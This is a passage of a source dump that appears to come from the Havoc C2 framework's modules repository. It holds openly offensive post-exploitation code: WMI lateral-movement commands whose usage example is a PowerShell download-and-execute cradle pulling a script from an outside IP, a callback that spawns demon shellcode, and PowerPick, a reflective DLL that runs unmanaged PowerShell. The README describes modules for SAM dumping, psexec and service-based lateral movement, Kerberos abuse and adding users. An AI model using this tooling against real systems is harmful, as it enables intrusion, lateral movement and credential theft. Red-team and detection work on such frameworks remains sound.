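    # explicit-credential branch was unreachable; the shared helper uses the right count
    creds = _wmi_credentials( demon, params )
    if creds is None:
        return False

    target  = f'\\\\{params[ 0 ]}\\ROOT\\CIMV2'
    command = params[ 1 ]

    _wmi_pack( packer, target, creds, command )

    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to run command on {target} via wmi" )

    demon.InlineExecute( TaskID, "go", f"ProcCreate/bin/ProcCreate.{demon.ProcessArch}.o", packer.getbuffer(), False )

    return TaskID


RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" )
RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path [username password domain]", "10.10.10.10 /tmp/demon.vba" )
RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command [username password domain]", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" )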
-------------------------------------------------------------------------------- /Jump-exec/makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */) 2 | 3 | .PHONY: all $(SUBDIRS) 4 | 5 | all: $(SUBDIRS) 6 | 7 | $(SUBDIRS): 8 | @if [ -f $@/makefile ]; then \ 9 | echo "Building $@"; \ 10 | $(MAKE) -C $@; \ 11 | else \ 12 | echo "Skipping $@ (makefile not found)"; \ 13 | fi 14 | -------------------------------------------------------------------------------- /Migrate/auto_migrate.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCallback 2 | 3 | def new_demon( demonID ): 4 | demon : Demon = None 5 | demon = Demon( demonID ) 6 | 7 | if demon.OSArch.startswith(demon.ProcessArch) is False: 8 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"migrating to x64" ) 9 | demon.Command(TaskID, 'shellcode spawn x64 /tmp/demon.x64.bin') 10 | 11 | RegisterCallback(new_demon) 12 | -------------------------------------------------------------------------------- /NoConsolation/bin/NoConsolation.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/NoConsolation/bin/NoConsolation.x64.o -------------------------------------------------------------------------------- /NoConsolation/bin/NoConsolation.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/NoConsolation/bin/NoConsolation.x86.o -------------------------------------------------------------------------------- /NoConsolation/makefile: -------------------------------------------------------------------------------- 1 | NAME = No-Consolation 2 | BIN = bin 3 | 4 | all: 5 | @ cd $(NAME); make 6 | @ find $(NAME)/dist -name '*.o' -exec cp 
{} $(BIN)/ \; 7 | 8 | clean: 9 | rm $(BIN)/*.o 10 | -------------------------------------------------------------------------------- /Packer/packer.py: -------------------------------------------------------------------------------- 1 | from struct import pack, calcsize 2 | 3 | # 4 | # this is a helper class 5 | # 6 | 7 | class Packer: 8 | def __init__(self): 9 | self.buffer : bytes = b'' 10 | self.size : int = 0 11 | 12 | def getbuffer(self): 13 | return pack(" 3 | #include 4 | #include 5 | 6 | typedef struct _INSTANCE { 7 | 8 | struct { 9 | 10 | WIN32_FUNC( printf ) 11 | WINBASEAPI HRESULT ( WINAPI *CLRCreateInstance ) ( REFCLSID clsid, REFIID riid, LPVOID* ppInterface ); 12 | 13 | } Win32; 14 | 15 | struct { 16 | 17 | PVOID Msvcrt; 18 | PVOID Mscoree; 19 | 20 | } Modules; 21 | 22 | } INSTANCE, *PINSTANCE; 23 | 24 | extern INSTANCE Instance; 25 | 26 | VOID ModuleInit(); 27 | VOID ModuleMain(); -------------------------------------------------------------------------------- /PowerPick/include/KaynLdr.h: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | * Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #ifndef KAYNLDR_KAYNLDR_H 7 | #define KAYNLDR_KAYNLDR_H 8 | 9 | #define _NO_NTDLL_CRT_ 10 | 11 | #include 12 | #include 13 | 14 | #define DLL_QUERY_HMODULE 6 15 | 16 | #define HASH_KEY 5381 17 | 18 | #ifdef _WIN64 19 | #define PPEB_PTR __readgsqword( 0x60 ) 20 | #else 21 | #define PPEB_PTR __readgsqword( 0x30 ) 22 | #endif 23 | 24 | #define MemCopy __builtin_memcpy 25 | #define NTDLL_HASH 0x70e61753 26 | 27 | #define SYS_LDRLOADDLL 0x9e456a43 28 | #define SYS_NTALLOCATEVIRTUALMEMORY 0xf783b8ec 29 | #define SYS_NTPROTECTEDVIRTUALMEMORY 0x50e92888 30 | 31 | #define DLLEXPORT __declspec( dllexport ) 32 | #define WIN32_FUNC( x ) __typeof__( x ) * x; 33 | 34 | #define U_PTR( x ) ( ( UINT_PTR ) x ) 35 | #define C_PTR( x ) ( ( LPVOID ) x ) 36 | 37 | typedef struct { 38 | 39 | struct { 40 | WIN32_FUNC( LdrLoadDll ); 41 | 
WIN32_FUNC( NtAllocateVirtualMemory ) 42 | WIN32_FUNC( NtProtectVirtualMemory ) 43 | } Win32; 44 | 45 | struct { 46 | PVOID Ntdll; 47 | } Modules ; 48 | 49 | } KAYNINSTANCE, *PKAYNINSTANCE ; 50 | 51 | LPVOID KaynCaller(); 52 | 53 | typedef struct { 54 | WORD offset :12; 55 | WORD type :4; 56 | } *PIMAGE_RELOC; 57 | 58 | PVOID KGetModuleByHash( DWORD hash ); 59 | PVOID KGetProcAddressByHash( PKAYNINSTANCE Instance, PVOID DllModuleBase, DWORD FunctionHash, DWORD Ordinal ); 60 | PVOID KLoadLibrary( PKAYNINSTANCE Instance, LPSTR Module ); 61 | 62 | VOID KResolveIAT( PKAYNINSTANCE Instance, PVOID KaynImage, PVOID IatDir ); 63 | VOID KReAllocSections( PVOID KaynImage, PVOID ImageBase, PVOID Dir ); 64 | 65 | DWORD KHashString( LPVOID String, SIZE_T Size ); 66 | SIZE_T KStringLengthA( LPCSTR String ); 67 | SIZE_T KStringLengthW( LPCWSTR String ); 68 | VOID KMemSet( PVOID Destination, INT Value, SIZE_T Size ); 69 | SIZE_T KCharStringToWCharString( PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed ); 70 | 71 | #endif 72 | -------------------------------------------------------------------------------- /PowerPick/include/Parser.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | typedef struct { 5 | PCHAR original; 6 | PCHAR buffer; 7 | UINT32 length; 8 | } PARSER, *PPARSER ; 9 | 10 | VOID ParserNew( PPARSER parser, PCHAR buffer ); 11 | INT ParserGetInt32( PPARSER parser); 12 | PCHAR ParserGetBytes( PPARSER parser, PINT size); -------------------------------------------------------------------------------- /PowerPick/include/Win32.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed); -------------------------------------------------------------------------------- /PowerPick/makefile: 
-------------------------------------------------------------------------------- 1 | MAKEFLAGS += -s 2 | 3 | NAME = PowerPick 4 | 5 | COMPILER_x86 = i686-w64-mingw32-gcc 6 | COMPILER_x64 = x86_64-w64-mingw32-gcc 7 | 8 | CFLAGS = -Os -fno-asynchronous-unwind-tables -shared -masm=intel 9 | CFLAGS += -fno-ident -fpack-struct=8 -falign-functions=1 10 | CFLAGS += -s -ffunction-sections -falign-jumps=1 -w 11 | CFLAGS += -falign-labels=1 -fPIC 12 | CFLAGS += -Wl,-s,--no-seh,--enable-stdcall-fixup 13 | CFLAGS += -l oleaut32 -l uuid 14 | 15 | INCLUDE = -I include 16 | SOURCE = $(wildcard src/*.c) 17 | 18 | x64: 19 | nasm -f win64 src/Util.s -o src/Util.o 20 | $(COMPILER_x64) src/*.o $(INCLUDE) $(SOURCE) $(CFLAGS) -o bin/$(NAME).x64.dll -lntdll -luser32 21 | rm src/*.o -------------------------------------------------------------------------------- /PowerPick/powerpick.py: -------------------------------------------------------------------------------- 1 | 2 | from havoc import Demon, RegisterCommand 3 | 4 | def PowerPick(demonID, *param): 5 | TaskID : str = None 6 | demon : Demon = None 7 | packer = Packer() 8 | 9 | demon = Demon( demonID ) 10 | 11 | if demon.ProcessArch == 'x86': 12 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" ) 13 | return False 14 | 15 | if len( param ) < 1: 16 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough arguments" ) 17 | return 18 | 19 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to execute unmanaged powershell commands" ) 20 | 21 | packer.addstr( " " + ''.join( param ) ) 22 | demon.DllSpawn( TaskID, "bin/PowerPick.x64.dll", packer.getbuffer() ) 23 | 24 | return TaskID 25 | 26 | RegisterCommand( PowerPick, "", "powerpick", "executes unmanaged powershell commands", 0, "[args]", "whoami" ) 27 | -------------------------------------------------------------------------------- /PowerPick/src/DllMain.c: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | 
* Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | 10 | HINSTANCE hAppInstance = NULL; 11 | INSTANCE Instance = { 0 }; 12 | 13 | BOOL WINAPI DllMain( HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpReserved ) 14 | { 15 | BOOL bReturnValue = TRUE; 16 | 17 | switch( dwReason ) 18 | { 19 | case DLL_QUERY_HMODULE: 20 | if( lpReserved != NULL ) 21 | *( HMODULE* ) lpReserved = hAppInstance; 22 | break; 23 | 24 | case DLL_PROCESS_ATTACH: 25 | { 26 | hAppInstance = hInstDLL; 27 | 28 | ModuleInit(); 29 | ModuleMain( lpReserved ); 30 | 31 | fflush( stdout ); 32 | ExitProcess( 0 ); 33 | } 34 | 35 | case DLL_PROCESS_DETACH: 36 | case DLL_THREAD_ATTACH: 37 | case DLL_THREAD_DETACH: 38 | break; 39 | } 40 | return bReturnValue; 41 | } 42 | 43 | VOID ModuleInit() 44 | { 45 | Instance.Modules.Msvcrt = LoadLibraryA( "Msvcrt" ); 46 | if ( Instance.Modules.Msvcrt ) 47 | { 48 | Instance.Win32.printf = GetProcAddress( Instance.Modules.Msvcrt, "printf" ); 49 | } 50 | 51 | Instance.Modules.Mscoree = LoadLibraryA( "Mscoree" ); 52 | if ( Instance.Modules.Msvcrt ) 53 | { 54 | Instance.Win32.CLRCreateInstance = GetProcAddress( Instance.Modules.Mscoree, "CLRCreateInstance" ); 55 | } 56 | } 57 | 58 | VOID ModuleMain( PVOID Params ) 59 | { 60 | PARSER Parser = { 0 }; 61 | ParserNew( &Parser, Params ); 62 | 63 | InvokeAssembly( &Parser ); 64 | } -------------------------------------------------------------------------------- /PowerPick/src/InvokeAssembly.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "PowershellRunner.h" 3 | 4 | GUID xCLSID_CLRMetaHost = { 0x9280188d, 0xe8e, 0x4867, { 0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde } }; 5 | GUID xCLSID_CorRuntimeHost = { 0xcb2f6723, 0xab3a, 0x11d2, { 0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e } }; 6 | GUID xIID_AppDomain = { 0x05F696DC, 0x2B29, 0x3663, { 0xAD, 0x8B, 0xC4, 0x38, 0x9C, 0xF2, 0xA7, 0x13 } }; 7 | GUID xIID_ICLRMetaHost = { 0xD332DB9E, 
0xB9B3, 0x4125, { 0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16 } }; 8 | GUID xIID_ICLRRuntimeInfo = { 0xBD39D1D2, 0xBA2F, 0x486a, { 0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91 } }; 9 | GUID xIID_ICorRuntimeHost = { 0xcb2f6722, 0xab3a, 0x11d2, { 0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e } }; 10 | 11 | BOOL FindVersion( PVOID assembly, INT length ) 12 | { 13 | PCHAR assembly_c = (char*)assembly; 14 | 15 | CHAR v4[] = { 0x76, 0x34, 0x2E, 0x30, 0x2E, 0x33, 0x30, 0x33, 0x31, 0x39 }; 16 | 17 | for ( INT i = 0; i < length; i++ ) 18 | { 19 | for ( INT j = 0; j < 10; j++ ) 20 | { 21 | if ( v4[ j ] != assembly_c[ i + j ] ) 22 | break; 23 | else 24 | { 25 | if ( j == 9 ) 26 | return 1; 27 | } 28 | } 29 | } 30 | 31 | return 0; 32 | } 33 | 34 | VOID InvokeAssembly( PPARSER DataArgs ) 35 | { 36 | SIZE_T ArgumentsLen = 0; 37 | PUCHAR Arguments = ParserGetBytes( DataArgs, &ArgumentsLen ); 38 | 39 | WCHAR wAppDomainName[ MAX_PATH ] = { 0 }; 40 | PWCHAR wArguments = LocalAlloc( LPTR, ArgumentsLen * sizeof( WCHAR ) ); 41 | 42 | // CLR & .Net Instances 43 | ICLRMetaHost* pClrMetaHost = { NULL }; 44 | ICLRRuntimeInfo* pClrRuntimeInfo = { NULL }; 45 | ICorRuntimeHost* pICorRuntimeHost = { NULL }; 46 | Assembly* pAssembly = { NULL }; 47 | IUnknown* pAppDomainThunk = { NULL }; 48 | AppDomain* pAppDomain = { NULL }; 49 | MethodInfo* pMethodInfo = { NULL }; 50 | VARIANT vtPsa = { 0 }; 51 | LPVOID pvData = { NULL }; 52 | 53 | VARIANT retVal = { 0 }; 54 | VARIANT obj = { 0 }; 55 | 56 | LPWSTR NetVersion = L"v4.0.30319"; 57 | 58 | // Convert Ansi Strings to Wide Strings 59 | CharStringToWCharString( wArguments, Arguments, ArgumentsLen ); 60 | 61 | // Hosting CLR 62 | if ( ! 
W32CreateClrInstance( NetVersion, &pClrMetaHost, &pClrRuntimeInfo, &pICorRuntimeHost ) ) 63 | { 64 | Instance.Win32.printf( "[-] Couldn't start CLR \n" ); 65 | return; 66 | } 67 | 68 | SAFEARRAYBOUND rgsabound[1] = { 0 }; 69 | rgsabound[0].cElements = PowershellRunnerSize; 70 | rgsabound[0].lLbound = 0; 71 | SAFEARRAY* pSafeArray = SafeArrayCreate(VT_UI1, 1, rgsabound); 72 | 73 | if ( pICorRuntimeHost->lpVtbl->CreateDomain( pICorRuntimeHost, wAppDomainName, NULL, &pAppDomainThunk ) != S_OK ) 74 | goto Cleanup; 75 | 76 | if ( pAppDomainThunk->lpVtbl->QueryInterface( pAppDomainThunk, &xIID_AppDomain, &pAppDomain ) != S_OK ) 77 | goto Cleanup; 78 | 79 | if ( SafeArrayAccessData( pSafeArray, &pvData ) != S_OK ) 80 | goto Cleanup; 81 | 82 | MemCopy( pvData, PowershellRunner, PowershellRunnerSize ); 83 | 84 | if ( SafeArrayUnaccessData( pSafeArray ) != S_OK ) 85 | Instance.Win32.printf( "[-] SafeArrayUnaccessData: Failed\n" ); 86 | 87 | if ( pAppDomain->lpVtbl->Load_3( pAppDomain, pSafeArray, &pAssembly ) != S_OK ) 88 | goto Cleanup; 89 | 90 | if ( pAssembly->lpVtbl->EntryPoint( pAssembly, &pMethodInfo ) != S_OK ) 91 | goto Cleanup; 92 | 93 | obj.vt = VT_NULL; 94 | 95 | SAFEARRAY* psaStaticMethodArgs = SafeArrayCreateVector( VT_VARIANT, 0, 1 ); //Last field -> entryPoint == 1 is needed if Main(String[] args) 0 if Main() 96 | 97 | DWORD argumentCount; 98 | LPWSTR* argumentsArray = CommandLineToArgvW( wArguments, &argumentCount ); 99 | 100 | argumentsArray++; 101 | argumentCount--; 102 | 103 | vtPsa.vt = ( VT_ARRAY | VT_BSTR ); 104 | vtPsa.parray = SafeArrayCreateVector( VT_BSTR, 0, argumentCount ); 105 | 106 | for ( INT i = 0; i <= argumentCount; i++ ) 107 | SafeArrayPutElement( vtPsa.parray, &i, SysAllocString( argumentsArray[ i ] ) ); 108 | 109 | long idx[1] = { 0 }; 110 | SafeArrayPutElement(psaStaticMethodArgs, idx, &vtPsa); 111 | 112 | if ( pMethodInfo->lpVtbl->Invoke_3( pMethodInfo, obj, psaStaticMethodArgs, &retVal ) != S_OK ) 113 | goto Cleanup; 114 | 115 | 
Cleanup: 116 | if ( NULL != psaStaticMethodArgs ) 117 | { 118 | SafeArrayDestroy( psaStaticMethodArgs ); 119 | psaStaticMethodArgs = NULL; 120 | } 121 | 122 | if ( pMethodInfo != NULL ) 123 | { 124 | pMethodInfo->lpVtbl->Release( pMethodInfo ); 125 | pMethodInfo = NULL; 126 | } 127 | 128 | if ( pAssembly != NULL ) 129 | { 130 | pAssembly->lpVtbl->Release( pAssembly ); 131 | pAssembly = NULL; 132 | } 133 | 134 | if ( pAppDomain != NULL ) 135 | { 136 | pAppDomain->lpVtbl->Release( pAppDomain ); 137 | pAppDomain = NULL; 138 | } 139 | 140 | if ( pAppDomainThunk != NULL ) 141 | pAppDomainThunk->lpVtbl->Release( pAppDomainThunk ); 142 | 143 | if ( pICorRuntimeHost != NULL ) 144 | { 145 | pICorRuntimeHost->lpVtbl->UnloadDomain( pICorRuntimeHost, pAppDomainThunk ); 146 | pICorRuntimeHost->lpVtbl->Stop( pICorRuntimeHost ); 147 | pICorRuntimeHost = NULL; 148 | } 149 | 150 | if ( pClrRuntimeInfo != NULL ) 151 | { 152 | pClrRuntimeInfo->lpVtbl->Release( pClrRuntimeInfo ); 153 | pClrRuntimeInfo = NULL; 154 | } 155 | 156 | if ( pClrMetaHost != NULL ) 157 | { 158 | pClrMetaHost->lpVtbl->Release( pClrMetaHost ); 159 | pClrMetaHost = NULL; 160 | } 161 | } 162 | 163 | BOOL W32CreateClrInstance( LPCWSTR dotNetVersion, PICLRMetaHost *ppClrMetaHost, PICLRRuntimeInfo *ppClrRuntimeInfo, ICorRuntimeHost **ppICorRuntimeHost ) 164 | { 165 | BOOL fLoadable = FALSE; 166 | 167 | if ( Instance.Win32.CLRCreateInstance( &xCLSID_CLRMetaHost, &xIID_ICLRMetaHost, ppClrMetaHost ) == S_OK ) 168 | { 169 | if ( ( *ppClrMetaHost )->lpVtbl->GetRuntime( *ppClrMetaHost, dotNetVersion, &xIID_ICLRRuntimeInfo, (LPVOID*)ppClrRuntimeInfo ) == S_OK ) 170 | { 171 | if ( ( ( *ppClrRuntimeInfo )->lpVtbl->IsLoadable( *ppClrRuntimeInfo, &fLoadable ) == S_OK ) && fLoadable ) 172 | { 173 | //Load the CLR into the current process and return a runtime interface pointer. 
-> CLR changed to ICor which is deprecated but works 174 | if ( ( *ppClrRuntimeInfo )->lpVtbl->GetInterface( *ppClrRuntimeInfo, &xCLSID_CorRuntimeHost, &xIID_ICorRuntimeHost, ppICorRuntimeHost ) == S_OK ) 175 | { 176 | //Start it. This is okay to call even if the CLR is already running 177 | ( *ppICorRuntimeHost )->lpVtbl->Start( *ppICorRuntimeHost ); 178 | } 179 | else 180 | { 181 | Instance.Win32.printf("[-] ( GetInterface ) Process refusing to get interface of %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 182 | return 0; 183 | } 184 | } 185 | else 186 | { 187 | Instance.Win32.printf("[-] ( IsLoadable ) Process refusing to load %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 188 | return 0; 189 | } 190 | } 191 | else 192 | { 193 | Instance.Win32.printf("[-] ( GetRuntime ) Process refusing to get runtime of %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 194 | return 0; 195 | } 196 | } 197 | else 198 | { 199 | Instance.Win32.printf("[-] ( CLRCreateInstance ) Process refusing to create %ls CLR version. Try running an assembly that requires a different CLR version.\n", dotNetVersion); 200 | return 0; 201 | } 202 | 203 | return 1; 204 | } -------------------------------------------------------------------------------- /PowerPick/src/Parser.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | VOID ParserNew( PPARSER parser, PCHAR buffer ) 6 | { 7 | UINT32 Size = 0; 8 | 9 | if ( ! parser ) 10 | return; 11 | 12 | if ( ! 
buffer ) 13 | return 14 | 15 | memcpy( &Size, buffer, sizeof( UINT32 ) ); 16 | 17 | parser->buffer = buffer + sizeof( UINT32 ); 18 | parser->original = buffer; 19 | parser->length = Size - sizeof( UINT32 ); 20 | } 21 | 22 | INT32 ParserGetInt32( PPARSER parser ) 23 | { 24 | INT32 intBytes = 0; 25 | 26 | if ( parser->length < 4 ) 27 | return 0; 28 | 29 | memcpy( &intBytes, parser->buffer, 4 ); 30 | 31 | parser->buffer += 4; 32 | parser->length -= 4; 33 | 34 | return ( INT ) intBytes; 35 | } 36 | 37 | PCHAR ParserGetBytes( PPARSER parser, PINT size ) 38 | { 39 | UINT32 length = 0; 40 | PCHAR outdata = NULL; 41 | 42 | if ( parser->length < 4 ) 43 | return NULL; 44 | 45 | memcpy( &length, parser->buffer, 4 ); 46 | parser->buffer += 4; 47 | 48 | outdata = parser->buffer; 49 | if ( outdata == NULL ) 50 | return NULL; 51 | 52 | parser->length -= 4; 53 | parser->length -= length; 54 | parser->buffer += length; 55 | 56 | if ( size != NULL ) 57 | *size = length; 58 | 59 | return outdata; 60 | } 61 | -------------------------------------------------------------------------------- /PowerPick/src/Util.s: -------------------------------------------------------------------------------- 1 | ; KaynLdr 2 | ; Author: Paul Ungur (@C5pider) 3 | ; Credits: Austin Hudson (@ilove2pwn_), Chetan Nayak (@NinjaParanoid), Bobby Cooke (@0xBoku), @trickster012 4 | ; 5 | 6 | global KaynCaller 7 | 8 | section .text 9 | 10 | ; Shameless copied from Bobby Cooke CobaltStrikeReflectiveLoader (https://github.com/boku7/CobaltStrikeReflectiveLoader) 11 | KaynCaller: 12 | call pop 13 | pop: 14 | pop rcx 15 | loop: 16 | xor rbx, rbx 17 | mov ebx, 0x5A4D 18 | dec rcx 19 | cmp bx, word ds:[ rcx ] 20 | jne loop 21 | xor rax, rax 22 | mov ax, [ rcx + 0x3C ] 23 | add rax, rcx 24 | xor rbx, rbx 25 | add bx, 0x4550 26 | cmp bx, word ds:[ rax ] 27 | jne loop 28 | mov rax, rcx 29 | ret -------------------------------------------------------------------------------- /PowerPick/src/Win32.c: 
--------------------------------------------------------------------------------
#include  /* header name missing in this listing */

/*
 * Copy a narrow (char) string into a wide (WCHAR) buffer by plain
 * element-wise assignment -- no code-page conversion is performed, so the
 * result for bytes above 0x7F depends on whether char is signed.
 *
 * Destination:    wide buffer to fill.
 * Source:         narrow string to copy.
 * MaximumAllowed: maximum number of characters to examine/copy; narrowed to
 *                 INT for the loop counter.
 *
 * Returns the number of characters copied before the terminating NUL (the NUL
 * is copied but not counted). If no NUL is found within MaximumAllowed
 * characters the function returns MaximumAllowed + 1 and Destination is left
 * WITHOUT a terminator, so callers must compare the return value with
 * MaximumAllowed before treating Destination as a C string.
 */
SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed)
{
    INT Length = MaximumAllowed;  /* SIZE_T -> INT narrowing */

    while (--Length >= 0)
    {
        /* Assignment happens first, so the NUL is written before the test. */
        if (!(*Destination++ = *Source++))
            return MaximumAllowed - Length - 1;
    }

    /* Loop exhausted with Length == -1: no terminator seen. */
    return MaximumAllowed - Length;
}
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Modules
Modules used by the Havoc Framework.

### Powerpick
Powerpick implementation for the Havoc Framework.

### InvokeAssembly
InvokeAssembly implementation for the Havoc Framework.

### Template
This is the base template for the modules. You can use this to write your own modules for the Havoc Framework.

### SituationalAwareness
A bunch of Situational Awareness beacon object files. From [Situational Awareness BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF)

### RemoteOps
A bunch of Remote Operation beacon object files. From [Remote Operations BOF](https://github.com/trustedsec/CS-Remote-OPs-BOF)

### Domaininfo
A BOF tool to enumerate domain information using Active Directory Domain Services.
Full credit goes to [Cneelis](https://twitter.com/Cneelis). Bof is from his [C2-Tool-Collection](https://github.com/outflanknl/C2-Tool-Collection)

### Jump-exec psexec
A BOF to lateral move using the psexec technique.

### Jump-exec scshell
A BOF to lateral move using the scshell technique.
28 | This technique relies on ChangeServiceConfigA to run commands (in this case, our service executable). 29 | This BOF is based on [Mr-Un1k0d3r's](https://twitter.com/MrUn1k0d3r) [SCShell](https://github.com/Mr-Un1k0d3r/SCShell/tree/master/CS-BOF) 30 | 31 | ### nanorobeus 32 | Kerberos implementation for the Havoc Framework. 33 | 34 | ### Delegation 35 | Find delegation settings, users with SPNs and ASREP, using LDAP. 36 | 37 | ### SamDump 38 | Dump the SAM registry. 39 | 40 | ### Migrate 41 | Automatically migrate WoW64 demons to x64. 42 | -------------------------------------------------------------------------------- /RemoteOps/bin/adcs_request.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/adcs_request.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/adcs_request.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/adcs_request.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/adduser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/adduser.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/adduser.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/adduser.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/addusertogroup.x64.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/addusertogroup.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/addusertogroup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/addusertogroup.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/enableuser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/enableuser.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/enableuser.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/enableuser.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_delete.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_delete.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_delete.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_delete.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_save.x64.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_save.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_save.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_save.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_set.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_set.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/reg_set.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/reg_set.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_create.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_create.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_create.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_create.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_delete.x64.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_delete.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_delete.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_delete.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_description.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_description.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_description.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_description.x86.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_start.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/RemoteOps/bin/sc_start.x64.o -------------------------------------------------------------------------------- /RemoteOps/bin/sc_start.x86.o: -------------------------------------------------------------------------------- 